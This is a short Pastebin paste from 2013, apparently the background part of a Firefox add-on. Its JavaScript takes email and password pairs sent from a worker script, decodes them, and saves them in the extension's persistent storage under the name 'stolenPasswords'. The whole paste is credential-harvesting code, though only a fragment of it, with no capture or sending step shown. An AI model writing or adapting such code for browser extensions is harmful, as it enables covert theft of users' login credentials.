Advertisement
zono

simple storage

Jul 3rd, 2013
379
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. worker.port.on("getPassword", function(userNameAndPassword) {
  2.     if(/email=([^&]+)&password=(.+)/.test(userNameAndPassword)) {
  3.           ss.storage.stolenPasswords.push([decodeURIComponent(RegExp.$1),
  4.                                                                  decodeURIComponent(RegExp.$2)]);
  5.     }
  6. });
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement